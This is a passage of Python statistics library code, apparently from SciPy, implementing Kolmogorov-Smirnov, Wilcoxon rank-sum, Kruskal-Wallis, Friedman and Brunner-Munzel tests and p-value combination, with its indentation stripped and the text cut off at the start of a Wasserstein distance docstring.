B = np.zeros(lxj)
B[0] = 1
# Compute the B(x, y) terms
# The binomial coefficient is an integer, but special.binom()
# may return a float. Round it to the nearest integer.
for j in range(1, lxj):
Bj = np.round(special.binom(xj[j] + j, j))
if not np.isfinite(Bj):
raise FloatingPointError()
for i in range(j):
bin = np.round(special.binom(xj[j] - xj[i] + j - i, j-i))
Bj -= bin * B[i]
B[j] = Bj
if not np.isfinite(Bj):
raise FloatingPointError()
# Compute the number of path extensions...
num_paths = 0
for j in range(lxj):
bin = np.round(special.binom((m-xj[j]) + (n - j), n-j))
term = B[j] * bin
if not np.isfinite(term):
raise FloatingPointError()
num_paths += term
return np.round(num_paths)
def _attempt_exact_2kssamp(n1, n2, g, d, alternative):
"""Attempts to compute the exact 2sample probability.
n1, n2 are the sample sizes
g is the gcd(n1, n2)
d is the computed max difference in ECDFs
Returns (success, d, probability)
"""
lcm = (n1 // g) * n2
h = int(np.round(d * lcm))
d = h * 1.0 / lcm
if h == 0:
return True, d, 1.0
saw_fp_error, prob = False, np.nan
try:
if alternative == 'two-sided':
if n1 == n2:
prob = _compute_prob_outside_square(n1, h)
else:
prob = _compute_outer_prob_inside_method(n1, n2, g, h)
else:
if n1 == n2:
# prob = binom(2n, n-h) / binom(2n, n)
# Evaluating in that form incurs roundoff errors
# from special.binom. Instead calculate directly
jrange = np.arange(h)
prob = np.prod((n1 - jrange) / (n1 + jrange + 1.0))
else:
num_paths = _count_paths_outside_method(n1, n2, g, h)
bin = special.binom(n1 + n2, n1)
if not np.isfinite(bin) or not np.isfinite(num_paths)\
or num_paths > bin:
saw_fp_error = True
else:
prob = num_paths / bin
except FloatingPointError:
saw_fp_error = True
if saw_fp_error:
return False, d, np.nan
if not (0 <= prob <= 1):
return False, d, prob
return True, d, prob
def ks_2samp(data1, data2, alternative='two-sided', mode='auto'):
"""
Performs the two-sample Kolmogorov-Smirnov test for goodness of fit.
This test compares the underlying continuous distributions F(x) and G(x)
of two independent samples. See Notes for a description
of the available null and alternative hypotheses.
Parameters
----------
data1, data2 : array_like, 1-Dimensional
Two arrays of sample observations assumed to be drawn from a continuous
distribution, sample sizes can be different.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the null and alternative hypotheses. Default is 'two-sided'.
Please see explanations in the Notes below.
mode : {'auto', 'exact', 'asymp'}, optional
Defines the method used for calculating the p-value.
The following options are available (default is 'auto'):
* 'auto' : use 'exact' for small size arrays, 'asymp' for large
* 'exact' : use exact distribution of test statistic
* 'asymp' : use asymptotic distribution of test statistic
Returns
-------
statistic : float
KS statistic.
pvalue : float
One-tailed or two-tailed p-value.
See Also
--------
kstest, ks_1samp, epps_singleton_2samp, anderson_ksamp
Notes
-----
There are three options for the null and corresponding alternative
hypothesis that can be selected using the `alternative` parameter.
- `two-sided`: The null hypothesis is that the two distributions are
identical, F(x)=G(x) for all x; the alternative is that they are not
identical.
- `less`: The null hypothesis is that F(x) >= G(x) for all x; the
alternative is that F(x) < G(x) for at least one x.
- `greater`: The null hypothesis is that F(x) <= G(x) for all x; the
alternative is that F(x) > G(x) for at least one x.
Note that the alternative hypotheses describe the *CDFs* of the
underlying distributions, not the observed values. For example,
suppose x1 ~ F and x2 ~ G. If F(x) > G(x) for all x, the values in
x1 tend to be less than those in x2.
If the KS statistic is small or the p-value is high, then we cannot
reject the null hypothesis in favor of the alternative.
If the mode is 'auto', the computation is exact if the sample sizes are
less than 10000. For larger sizes, the computation uses the
Kolmogorov-Smirnov distributions to compute an approximate value.
The 'two-sided' 'exact' computation computes the complementary probability
and then subtracts from 1. As such, the minimum probability it can return
is about 1e-16. While the algorithm itself is exact, numerical
errors may accumulate for large sample sizes. It is most suited to
situations in which one of the sample sizes is only a few thousand.
We generally follow Hodges' treatment of Drion/Gnedenko/Korolyuk [1]_.
References
----------
.. [1] Hodges, J.L. Jr., "The Significance Probability of the Smirnov
Two-Sample Test," Arkiv fiur Matematik, 3, No. 43 (1958), 469-86.
Examples
--------
>>> from scipy import stats
>>> rng = np.random.default_rng()
>>> n1 = 200 # size of first sample
>>> n2 = 300 # size of second sample
For a different distribution, we can reject the null hypothesis since the
pvalue is below 1%:
>>> rvs1 = stats.norm.rvs(size=n1, loc=0., scale=1, random_state=rng)
>>> rvs2 = stats.norm.rvs(size=n2, loc=0.5, scale=1.5, random_state=rng)
>>> stats.ks_2samp(rvs1, rvs2)
KstestResult(statistic=0.24833333333333332, pvalue=5.846586728086578e-07)
For a slightly different distribution, we cannot reject the null hypothesis
at a 10% or lower alpha since the p-value at 0.144 is higher than 10%
>>> rvs3 = stats.norm.rvs(size=n2, loc=0.01, scale=1.0, random_state=rng)
>>> stats.ks_2samp(rvs1, rvs3)
KstestResult(statistic=0.07833333333333334, pvalue=0.4379658456442945)
For an identical distribution, we cannot reject the null hypothesis since
the p-value is high, 41%:
>>> rvs4 = stats.norm.rvs(size=n2, loc=0.0, scale=1.0, random_state=rng)
>>> stats.ks_2samp(rvs1, rvs4)
KstestResult(statistic=0.12166666666666667, pvalue=0.05401863039081145)
"""
if mode not in ['auto', 'exact', 'asymp']:
raise ValueError(f'Invalid value for mode: {mode}')
alternative = {'t': 'two-sided', 'g': 'greater', 'l': 'less'}.get(
alternative.lower()[0], alternative)
if alternative not in ['two-sided', 'less', 'greater']:
raise ValueError(f'Invalid value for alternative: {alternative}')
MAX_AUTO_N = 10000 # 'auto' will attempt to be exact if n1,n2 <= MAX_AUTO_N
if np.ma.is_masked(data1):
data1 = data1.compressed()
if np.ma.is_masked(data2):
data2 = data2.compressed()
data1 = np.sort(data1)
data2 = np.sort(data2)
n1 = data1.shape[0]
n2 = data2.shape[0]
if min(n1, n2) == 0:
raise ValueError('Data passed to ks_2samp must not be empty')
data_all = np.concatenate([data1, data2])
# using searchsorted solves equal data problem
cdf1 = np.searchsorted(data1, data_all, side='right') / n1
cdf2 = np.searchsorted(data2, data_all, side='right') / n2
cddiffs = cdf1 - cdf2
# Ensure sign of minS is not negative.
minS = np.clip(-np.min(cddiffs), 0, 1)
maxS = np.max(cddiffs)
alt2Dvalue = {'less': minS, 'greater': maxS, 'two-sided': max(minS, maxS)}
d = alt2Dvalue[alternative]
g = gcd(n1, n2)
n1g = n1 // g
n2g = n2 // g
prob = -np.inf
original_mode = mode
if mode == 'auto':
mode = 'exact' if max(n1, n2) <= MAX_AUTO_N else 'asymp'
elif mode == 'exact':
# If lcm(n1, n2) is too big, switch from exact to asymp
if n1g >= np.iinfo(np.int32).max / n2g:
mode = 'asymp'
warnings.warn(
f"Exact ks_2samp calculation not possible with samples sizes "
f"{n1} and {n2}. Switching to 'asymp'.", RuntimeWarning)
if mode == 'exact':
success, d, prob = _attempt_exact_2kssamp(n1, n2, g, d, alternative)
if not success:
mode = 'asymp'
if original_mode == 'exact':
warnings.warn(f"ks_2samp: Exact calculation unsuccessful. "
f"Switching to mode={mode}.", RuntimeWarning)
if mode == 'asymp':
# The product n1*n2 is large. Use Smirnov's asymptoptic formula.
# Ensure float to avoid overflow in multiplication
# sorted because the one-sided formula is not symmetric in n1, n2
m, n = sorted([float(n1), float(n2)], reverse=True)
en = m * n / (m + n)
if alternative == 'two-sided':
prob = distributions.kstwo.sf(d, np.round(en))
else:
z = np.sqrt(en) * d
# Use Hodges' suggested approximation Eqn 5.3
# Requires m to be the larger of (n1, n2)
expt = -2 * z**2 - 2 * z * (m + 2*n)/np.sqrt(m*n*(m+n))/3.0
prob = np.exp(expt)
prob = np.clip(prob, 0, 1)
return KstestResult(d, prob)
def _parse_kstest_args(data1, data2, args, N):
# kstest allows many different variations of arguments.
# Pull out the parsing into a separate function
# (xvals, yvals, ) # 2sample
# (xvals, cdf function,..)
# (xvals, name of distribution, ...)
# (name of distribution, name of distribution, ...)
# Returns xvals, yvals, cdf
# where cdf is a cdf function, or None
# and yvals is either an array_like of values, or None
# and xvals is array_like.
rvsfunc, cdf = None, None
if isinstance(data1, str):
rvsfunc = getattr(distributions, data1).rvs
elif callable(data1):
rvsfunc = data1
if isinstance(data2, str):
cdf = getattr(distributions, data2).cdf
data2 = None
elif callable(data2):
cdf = data2
data2 = None
data1 = np.sort(rvsfunc(*args, size=N) if rvsfunc else data1)
return data1, data2, cdf
def kstest(rvs, cdf, args=(), N=20, alternative='two-sided', mode='auto'):
"""
Performs the (one-sample or two-sample) Kolmogorov-Smirnov test for
goodness of fit.
The one-sample test compares the underlying distribution F(x) of a sample
against a given distribution G(x). The two-sample test compares the
underlying distributions of two independent samples. Both tests are valid
only for continuous distributions.
Parameters
----------
rvs : str, array_like, or callable
If an array, it should be a 1-D array of observations of random
variables.
If a callable, it should be a function to generate random variables;
it is required to have a keyword argument `size`.
If a string, it should be the name of a distribution in `scipy.stats`,
which will be used to generate random variables.
cdf : str, array_like or callable
If array_like, it should be a 1-D array of observations of random
variables, and the two-sample test is performed
(and rvs must be array_like).
If a callable, that callable is used to calculate the cdf.
If a string, it should be the name of a distribution in `scipy.stats`,
which will be used as the cdf function.
args : tuple, sequence, optional
Distribution parameters, used if `rvs` or `cdf` are strings or
callables.
N : int, optional
Sample size if `rvs` is string or callable. Default is 20.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the null and alternative hypotheses. Default is 'two-sided'.
Please see explanations in the Notes below.
mode : {'auto', 'exact', 'approx', 'asymp'}, optional
Defines the distribution used for calculating the p-value.
The following options are available (default is 'auto'):
* 'auto' : selects one of the other options.
* 'exact' : uses the exact distribution of test statistic.
* 'approx' : approximates the two-sided probability with twice the
one-sided probability
* 'asymp': uses asymptotic distribution of test statistic
Returns
-------
statistic : float
KS test statistic, either D, D+ or D-.
pvalue : float
One-tailed or two-tailed p-value.
See Also
--------
ks_2samp
Notes
-----
There are three options for the null and corresponding alternative
hypothesis that can be selected using the `alternative` parameter.
- `two-sided`: The null hypothesis is that the two distributions are
identical, F(x)=G(x) for all x; the alternative is that they are not
identical.
- `less`: The null hypothesis is that F(x) >= G(x) for all x; the
alternative is that F(x) < G(x) for at least one x.
- `greater`: The null hypothesis is that F(x) <= G(x) for all x; the
alternative is that F(x) > G(x) for at least one x.
Note that the alternative hypotheses describe the *CDFs* of the
underlying distributions, not the observed values. For example,
suppose x1 ~ F and x2 ~ G. If F(x) > G(x) for all x, the values in
x1 tend to be less than those in x2.
Examples
--------
>>> from scipy import stats
>>> rng = np.random.default_rng()
>>> x = np.linspace(-15, 15, 9)
>>> stats.kstest(x, 'norm')
KstestResult(statistic=0.444356027159..., pvalue=0.038850140086...)
>>> stats.kstest(stats.norm.rvs(size=100, random_state=rng), stats.norm.cdf)
KstestResult(statistic=0.165471391799..., pvalue=0.007331283245...)
The above lines are equivalent to:
>>> stats.kstest(stats.norm.rvs, 'norm', N=100)
KstestResult(statistic=0.113810164200..., pvalue=0.138690052319...) # may vary
*Test against one-sided alternative hypothesis*
Shift distribution to larger values, so that ``CDF(x) < norm.cdf(x)``:
>>> x = stats.norm.rvs(loc=0.2, size=100, random_state=rng)
>>> stats.kstest(x, 'norm', alternative='less')
KstestResult(statistic=0.1002033514..., pvalue=0.1255446444...)
Reject null hypothesis in favor of alternative hypothesis: less
>>> stats.kstest(x, 'norm', alternative='greater')
KstestResult(statistic=0.018749806388..., pvalue=0.920581859791...)
Don't reject null hypothesis in favor of alternative hypothesis: greater
>>> stats.kstest(x, 'norm')
KstestResult(statistic=0.100203351482..., pvalue=0.250616879765...)
*Testing t distributed random variables against normal distribution*
With 100 degrees of freedom the t distribution looks close to the normal
distribution, and the K-S test does not reject the hypothesis that the
sample came from the normal distribution:
>>> stats.kstest(stats.t.rvs(100, size=100, random_state=rng), 'norm')
KstestResult(statistic=0.064273776544..., pvalue=0.778737758305...)
With 3 degrees of freedom the t distribution looks sufficiently different
from the normal distribution, that we can reject the hypothesis that the
sample came from the normal distribution at the 10% level:
>>> stats.kstest(stats.t.rvs(3, size=100, random_state=rng), 'norm')
KstestResult(statistic=0.128678487493..., pvalue=0.066569081515...)
"""
# to not break compatibility with existing code
if alternative == 'two_sided':
alternative = 'two-sided'
if alternative not in ['two-sided', 'greater', 'less']:
raise ValueError("Unexpected alternative %s" % alternative)
xvals, yvals, cdf = _parse_kstest_args(rvs, cdf, args, N)
if cdf:
return ks_1samp(xvals, cdf, args=args, alternative=alternative,
mode=mode)
return ks_2samp(xvals, yvals, alternative=alternative, mode=mode)
def tiecorrect(rankvals):
"""Tie correction factor for Mann-Whitney U and Kruskal-Wallis H tests.
Parameters
----------
rankvals : array_like
A 1-D sequence of ranks. Typically this will be the array
returned by `~scipy.stats.rankdata`.
Returns
-------
factor : float
Correction factor for U or H.
See Also
--------
rankdata : Assign ranks to the data
mannwhitneyu : Mann-Whitney rank test
kruskal : Kruskal-Wallis H test
References
----------
.. [1] Siegel, S. (1956) Nonparametric Statistics for the Behavioral
Sciences. New York: McGraw-Hill.
Examples
--------
>>> from scipy.stats import tiecorrect, rankdata
>>> tiecorrect([1, 2.5, 2.5, 4])
0.9
>>> ranks = rankdata([1, 3, 2, 4, 5, 7, 2, 8, 4])
>>> ranks
array([ 1. , 4. , 2.5, 5.5, 7. , 8. , 2.5, 9. , 5.5])
>>> tiecorrect(ranks)
0.9833333333333333
"""
arr = np.sort(rankvals)
idx = np.nonzero(np.r_[True, arr[1:] != arr[:-1], True])[0]
cnt = np.diff(idx).astype(np.float64)
size = np.float64(arr.size)
return 1.0 if size < 2 else 1.0 - (cnt**3 - cnt).sum() / (size**3 - size)
RanksumsResult = namedtuple('RanksumsResult', ('statistic', 'pvalue'))
@_axis_nan_policy_factory(RanksumsResult, n_samples=2)
def ranksums(x, y, alternative='two-sided'):
"""Compute the Wilcoxon rank-sum statistic for two samples.
The Wilcoxon rank-sum test tests the null hypothesis that two sets
of measurements are drawn from the same distribution. The alternative
hypothesis is that values in one sample are more likely to be
larger than the values in the other sample.
This test should be used to compare two samples from continuous
distributions. It does not handle ties between measurements
in x and y. For tie-handling and an optional continuity correction
see `scipy.stats.mannwhitneyu`.
Parameters
----------
x,y : array_like
The data from the two samples.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis. Default is 'two-sided'.
The following options are available:
* 'two-sided': one of the distributions (underlying `x` or `y`) is
stochastically greater than the other.
* 'less': the distribution underlying `x` is stochastically less
than the distribution underlying `y`.
* 'greater': the distribution underlying `x` is stochastically greater
than the distribution underlying `y`.
.. versionadded:: 1.7.0
Returns
-------
statistic : float
The test statistic under the large-sample approximation that the
rank sum statistic is normally distributed.
pvalue : float
The p-value of the test.
References
----------
.. [1] https://en.wikipedia.org/wiki/Wilcoxon_rank-sum_test
Examples
--------
We can test the hypothesis that two independent unequal-sized samples are
drawn from the same distribution with computing the Wilcoxon rank-sum
statistic.
>>> from scipy.stats import ranksums
>>> rng = np.random.default_rng()
>>> sample1 = rng.uniform(-1, 1, 200)
>>> sample2 = rng.uniform(-0.5, 1.5, 300) # a shifted distribution
>>> ranksums(sample1, sample2)
RanksumsResult(statistic=-7.887059, pvalue=3.09390448e-15) # may vary
>>> ranksums(sample1, sample2, alternative='less')
RanksumsResult(statistic=-7.750585297581713, pvalue=4.573497606342543e-15) # may vary
>>> ranksums(sample1, sample2, alternative='greater')
RanksumsResult(statistic=-7.750585297581713, pvalue=0.9999999999999954) # may vary
The p-value of less than ``0.05`` indicates that this test rejects the
hypothesis at the 5% significance level.
"""
x, y = map(np.asarray, (x, y))
n1 = len(x)
n2 = len(y)
alldata = np.concatenate((x, y))
ranked = rankdata(alldata)
x = ranked[:n1]
s = np.sum(x, axis=0)
expected = n1 * (n1+n2+1) / 2.0
z = (s - expected) / np.sqrt(n1*n2*(n1+n2+1)/12.0)
z, prob = _normtest_finish(z, alternative)
return RanksumsResult(z, prob)
KruskalResult = namedtuple('KruskalResult', ('statistic', 'pvalue'))
@_axis_nan_policy_factory(KruskalResult, n_samples=None)
def kruskal(*args, nan_policy='propagate'):
"""Compute the Kruskal-Wallis H-test for independent samples.
The Kruskal-Wallis H-test tests the null hypothesis that the population
median of all of the groups are equal. It is a non-parametric version of
ANOVA. The test works on 2 or more independent samples, which may have
different sizes. Note that rejecting the null hypothesis does not
indicate which of the groups differs. Post hoc comparisons between
groups are required to determine which groups are different.
Parameters
----------
sample1, sample2, ... : array_like
Two or more arrays with the sample measurements can be given as
arguments. Samples must be one-dimensional.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float
The Kruskal-Wallis H statistic, corrected for ties.
pvalue : float
The p-value for the test using the assumption that H has a chi
square distribution. The p-value returned is the survival function of
the chi square distribution evaluated at H.
See Also
--------
f_oneway : 1-way ANOVA.
mannwhitneyu : Mann-Whitney rank test on two samples.
friedmanchisquare : Friedman test for repeated measurements.
Notes
-----
Due to the assumption that H has a chi square distribution, the number
of samples in each group must not be too small. A typical rule is
that each sample must have at least 5 measurements.
References
----------
.. [1] W. H. Kruskal & W. W. Wallis, "Use of Ranks in
One-Criterion Variance Analysis", Journal of the American Statistical
Association, Vol. 47, Issue 260, pp. 583-621, 1952.
.. [2] https://en.wikipedia.org/wiki/Kruskal-Wallis_one-way_analysis_of_variance
Examples
--------
>>> from scipy import stats
>>> x = [1, 3, 5, 7, 9]
>>> y = [2, 4, 6, 8, 10]
>>> stats.kruskal(x, y)
KruskalResult(statistic=0.2727272727272734, pvalue=0.6015081344405895)
>>> x = [1, 1, 1]
>>> y = [2, 2, 2]
>>> z = [2, 2]
>>> stats.kruskal(x, y, z)
KruskalResult(statistic=7.0, pvalue=0.0301973834223185)
"""
args = list(map(np.asarray, args))
num_groups = len(args)
if num_groups < 2:
raise ValueError("Need at least two groups in stats.kruskal()")
for arg in args:
if arg.size == 0:
return KruskalResult(np.nan, np.nan)
elif arg.ndim != 1:
raise ValueError("Samples must be one-dimensional.")
n = np.asarray(list(map(len, args)))
if nan_policy not in ('propagate', 'raise', 'omit'):
raise ValueError("nan_policy must be 'propagate', 'raise' or 'omit'")
contains_nan = False
for arg in args:
cn = _contains_nan(arg, nan_policy)
if cn[0]:
contains_nan = True
break
if contains_nan and nan_policy == 'omit':
for a in args:
a = ma.masked_invalid(a)
return mstats_basic.kruskal(*args)
if contains_nan and nan_policy == 'propagate':
return KruskalResult(np.nan, np.nan)
alldata = np.concatenate(args)
ranked = rankdata(alldata)
ties = tiecorrect(ranked)
if ties == 0:
raise ValueError('All numbers are identical in kruskal')
# Compute sum^2/n for each group and sum
j = np.insert(np.cumsum(n), 0, 0)
ssbn = 0
for i in range(num_groups):
ssbn += _square_of_sums(ranked[j[i]:j[i+1]]) / n[i]
totaln = np.sum(n, dtype=float)
h = 12.0 / (totaln * (totaln + 1)) * ssbn - 3 * (totaln + 1)
df = num_groups - 1
h /= ties
return KruskalResult(h, distributions.chi2.sf(h, df))
FriedmanchisquareResult = namedtuple('FriedmanchisquareResult',
('statistic', 'pvalue'))
def friedmanchisquare(*args):
"""Compute the Friedman test for repeated measurements.
The Friedman test tests the null hypothesis that repeated measurements of
the same individuals have the same distribution. It is often used
to test for consistency among measurements obtained in different ways.
For example, if two measurement techniques are used on the same set of
individuals, the Friedman test can be used to determine if the two
measurement techniques are consistent.
Parameters
----------
measurements1, measurements2, measurements3... : array_like
Arrays of measurements. All of the arrays must have the same number
of elements. At least 3 sets of measurements must be given.
Returns
-------
statistic : float
The test statistic, correcting for ties.
pvalue : float
The associated p-value assuming that the test statistic has a chi
squared distribution.
Notes
-----
Due to the assumption that the test statistic has a chi squared
distribution, the p-value is only reliable for n > 10 and more than
6 repeated measurements.
References
----------
.. [1] https://en.wikipedia.org/wiki/Friedman_test
"""
k = len(args)
if k < 3:
raise ValueError('At least 3 sets of measurements must be given '
'for Friedman test, got {}.'.format(k))
n = len(args[0])
for i in range(1, k):
if len(args[i]) != n:
raise ValueError('Unequal N in friedmanchisquare. Aborting.')
# Rank data
data = np.vstack(args).T
data = data.astype(float)
for i in range(len(data)):
data[i] = rankdata(data[i])
# Handle ties
ties = 0
for d in data:
replist, repnum = find_repeats(array(d))
for t in repnum:
ties += t * (t*t - 1)
c = 1 - ties / (k*(k*k - 1)*n)
ssbn = np.sum(data.sum(axis=0)**2)
chisq = (12.0 / (k*n*(k+1)) * ssbn - 3*n*(k+1)) / c
return FriedmanchisquareResult(chisq, distributions.chi2.sf(chisq, k - 1))
BrunnerMunzelResult = namedtuple('BrunnerMunzelResult',
('statistic', 'pvalue'))
def brunnermunzel(x, y, alternative="two-sided", distribution="t",
nan_policy='propagate'):
"""Compute the Brunner-Munzel test on samples x and y.
The Brunner-Munzel test is a nonparametric test of the null hypothesis that
when values are taken one by one from each group, the probabilities of
getting large values in both groups are equal.
Unlike the Wilcoxon-Mann-Whitney's U test, this does not require the
assumption of equivariance of two groups. Note that this does not assume
the distributions are same. This test works on two independent samples,
which may have different sizes.
Parameters
----------
x, y : array_like
Array of samples, should be one-dimensional.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided'
* 'less': one-sided
* 'greater': one-sided
distribution : {'t', 'normal'}, optional
Defines how to get the p-value.
The following options are available (default is 't'):
* 't': get the p-value by t-distribution
* 'normal': get the p-value by standard normal distribution.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float
The Brunner-Munzer W statistic.
pvalue : float
p-value assuming an t distribution. One-sided or
two-sided, depending on the choice of `alternative` and `distribution`.
See Also
--------
mannwhitneyu : Mann-Whitney rank test on two samples.
Notes
-----
Brunner and Munzel recommended to estimate the p-value by t-distribution
when the size of data is 50 or less. If the size is lower than 10, it would
be better to use permuted Brunner Munzel test (see [2]_).
References
----------
.. [1] Brunner, E. and Munzel, U. "The nonparametric Benhrens-Fisher
problem: Asymptotic theory and a small-sample approximation".
Biometrical Journal. Vol. 42(2000): 17-25.
.. [2] Neubert, K. and Brunner, E. "A studentized permutation test for the
non-parametric Behrens-Fisher problem". Computational Statistics and
Data Analysis. Vol. 51(2007): 5192-5204.
Examples
--------
>>> from scipy import stats
>>> x1 = [1,2,1,1,1,1,1,1,1,1,2,4,1,1]
>>> x2 = [3,3,4,3,1,2,3,1,1,5,4]
>>> w, p_value = stats.brunnermunzel(x1, x2)
>>> w
3.1374674823029505
>>> p_value
0.0057862086661515377
"""
x = np.asarray(x)
y = np.asarray(y)
# check both x and y
cnx, npx = _contains_nan(x, nan_policy)
cny, npy = _contains_nan(y, nan_policy)
contains_nan = cnx or cny
if npx == "omit" or npy == "omit":
nan_policy = "omit"
if contains_nan and nan_policy == "propagate":
return BrunnerMunzelResult(np.nan, np.nan)
elif contains_nan and nan_policy == "omit":
x = ma.masked_invalid(x)
y = ma.masked_invalid(y)
return mstats_basic.brunnermunzel(x, y, alternative, distribution)
nx = len(x)
ny = len(y)
if nx == 0 or ny == 0:
return BrunnerMunzelResult(np.nan, np.nan)
rankc = rankdata(np.concatenate((x, y)))
rankcx = rankc[0:nx]
rankcy = rankc[nx:nx+ny]
rankcx_mean = np.mean(rankcx)
rankcy_mean = np.mean(rankcy)
rankx = rankdata(x)
ranky = rankdata(y)
rankx_mean = np.mean(rankx)
ranky_mean = np.mean(ranky)
Sx = np.sum(np.power(rankcx - rankx - rankcx_mean + rankx_mean, 2.0))
Sx /= nx - 1
Sy = np.sum(np.power(rankcy - ranky - rankcy_mean + ranky_mean, 2.0))
Sy /= ny - 1
wbfn = nx * ny * (rankcy_mean - rankcx_mean)
wbfn /= (nx + ny) * np.sqrt(nx * Sx + ny * Sy)
if distribution == "t":
df_numer = np.power(nx * Sx + ny * Sy, 2.0)
df_denom = np.power(nx * Sx, 2.0) / (nx - 1)
df_denom += np.power(ny * Sy, 2.0) / (ny - 1)
df = df_numer / df_denom
p = distributions.t.cdf(wbfn, df)
elif distribution == "normal":
p = distributions.norm.cdf(wbfn)
else:
raise ValueError(
"distribution should be 't' or 'normal'")
if alternative == "greater":
pass
elif alternative == "less":
p = 1 - p
elif alternative == "two-sided":
p = 2 * np.min([p, 1-p])
else:
raise ValueError(
"alternative should be 'less', 'greater' or 'two-sided'")
return BrunnerMunzelResult(wbfn, p)
def combine_pvalues(pvalues, method='fisher', weights=None):
"""
Combine p-values from independent tests bearing upon the same hypothesis.
Parameters
----------
pvalues : array_like, 1-D
Array of p-values assumed to come from independent tests.
method : {'fisher', 'pearson', 'tippett', 'stouffer',
'mudholkar_george'}, optional
Name of method to use to combine p-values.
The following methods are available (default is 'fisher'):
* 'fisher': Fisher's method (Fisher's combined probability test), the
sum of the logarithm of the p-values
* 'pearson': Pearson's method (similar to Fisher's but uses sum of the
complement of the p-values inside the logarithms)
* 'tippett': Tippett's method (minimum of p-values)
* 'stouffer': Stouffer's Z-score method
* 'mudholkar_george': the difference of Fisher's and Pearson's methods
divided by 2
weights : array_like, 1-D, optional
Optional array of weights used only for Stouffer's Z-score method.
Returns
-------
statistic: float
The statistic calculated by the specified method.
pval: float
The combined p-value.
Notes
-----
Fisher's method (also known as Fisher's combined probability test) [1]_ uses
a chi-squared statistic to compute a combined p-value. The closely related
Stouffer's Z-score method [2]_ uses Z-scores rather than p-values. The
advantage of Stouffer's method is that it is straightforward to introduce
weights, which can make Stouffer's method more powerful than Fisher's
method when the p-values are from studies of different size [6]_ [7]_.
The Pearson's method uses :math:`log(1-p_i)` inside the sum whereas Fisher's
method uses :math:`log(p_i)` [4]_. For Fisher's and Pearson's method, the
sum of the logarithms is multiplied by -2 in the implementation. This
quantity has a chi-square distribution that determines the p-value. The
`mudholkar_george` method is the difference of the Fisher's and Pearson's
test statistics, each of which include the -2 factor [4]_. However, the
`mudholkar_george` method does not include these -2 factors. The test
statistic of `mudholkar_george` is the sum of logisitic random variables and
equation 3.6 in [3]_ is used to approximate the p-value based on Student's
t-distribution.
Fisher's method may be extended to combine p-values from dependent tests
[5]_. Extensions such as Brown's method and Kost's method are not currently
implemented.
.. versionadded:: 0.15.0
References
----------
.. [1] https://en.wikipedia.org/wiki/Fisher%27s_method
.. [2] https://en.wikipedia.org/wiki/Fisher%27s_method#Relation_to_Stouffer.27s_Z-score_method
.. [3] George, E. O., and G. S. Mudholkar. "On the convolution of logistic
random variables." Metrika 30.1 (1983): 1-13.
.. [4] Heard, N. and Rubin-Delanchey, P. "Choosing between methods of
combining p-values." Biometrika 105.1 (2018): 239-246.
.. [5] Whitlock, M. C. "Combining probability from independent tests: the
weighted Z-method is superior to Fisher's approach." Journal of
Evolutionary Biology 18, no. 5 (2005): 1368-1373.
.. [6] Zaykin, Dmitri V. "Optimally weighted Z-test is a powerful method
for combining probabilities in meta-analysis." Journal of
Evolutionary Biology 24, no. 8 (2011): 1836-1841.
.. [7] https://en.wikipedia.org/wiki/Extensions_of_Fisher%27s_method
"""
pvalues = np.asarray(pvalues)
if pvalues.ndim != 1:
raise ValueError("pvalues is not 1-D")
if method == 'fisher':
statistic = -2 * np.sum(np.log(pvalues))
pval = distributions.chi2.sf(statistic, 2 * len(pvalues))
elif method == 'pearson':
statistic = -2 * np.sum(np.log1p(-pvalues))
pval = distributions.chi2.sf(statistic, 2 * len(pvalues))
elif method == 'mudholkar_george':
normalizing_factor = np.sqrt(3/len(pvalues))/np.pi
statistic = -np.sum(np.log(pvalues)) + np.sum(np.log1p(-pvalues))
nu = 5 * len(pvalues) + 4
approx_factor = np.sqrt(nu / (nu - 2))
pval = distributions.t.sf(statistic * normalizing_factor
* approx_factor, nu)
elif method == 'tippett':
statistic = np.min(pvalues)
pval = distributions.beta.sf(statistic, 1, len(pvalues))
elif method == 'stouffer':
if weights is None:
weights = np.ones_like(pvalues)
elif len(weights) != len(pvalues):
raise ValueError("pvalues and weights must be of the same size.")
weights = np.asarray(weights)
if weights.ndim != 1:
raise ValueError("weights is not 1-D")
Zi = distributions.norm.isf(pvalues)
statistic = np.dot(weights, Zi) / np.linalg.norm(weights)
pval = distributions.norm.sf(statistic)
else:
raise ValueError(
"Invalid method '%s'. Options are 'fisher', 'pearson', \
'mudholkar_george', 'tippett', 'or 'stouffer'", method)
return (statistic, pval)
#####################################
# STATISTICAL DISTANCES #
#####################################
def wasserstein_distance(u_values, v_values, u_weights=None, v_weights=None):
r"""
Compute the first Wasserstein distance between two 1D distributions.
This distance is also known as the earth mover's distance, since it can be
seen as the minimum amount of "work" required to transform :math:`u` into
:math:`v`, where "work" is measured as the amount of distribution weight
that must be moved, multiplied by the distance it has to be moved.
.. versionadded:: 1.0.0
Parameters
----------
u_values, v_values : array_like
Values observed in the (empirical) distribution.
u_weights, v_weights : array_like, optional
Weight for each value. If unspecified, each value is assigned the same
weight.
`u_weights` (resp. `v_weights`) must have the same length as
`u_values` (resp. `v_values`). If the weight sum differs from 1, it
must still be positive and finite so that the weights can be normalized
to sum to 1.
Returns
-------
distance : float
The computed distance between the distributions.
Notes
-----
The first Wasserstein distance between the distributions :math:`u` and
:math:`v` is:
.. math::
l_1 (u, v) = \inf_{\pi \in \Gamma (u, v)} \int_{\mathbb{R} \times
\mathbb{R}} |x-y| \mathrm{d} \pi (x, y)
where :math:`\Gamma (u, v)` is the set of (probability) distributions on
:math:`\mathbb{R} \times \mathbb{R}` whose marginals are :math:`u` and
:math:`v` on the first and second factors respectively.
If :math:`U` and :math:`V` are the respective CDFs of :math:`u` and
:math:`v`, this distance also equals to:
.. math::
l_1(u, v) = \int_{-\infty}^{+\infty} |U-V|
See [2]_ for a proof of the equivalence of both definitions.
The input distributions can be empirical, therefore coming from samples
whose values are effectively inputs of the function, or they can be seen as
generalized functions, in which case they are weighted sums of Dirac delta
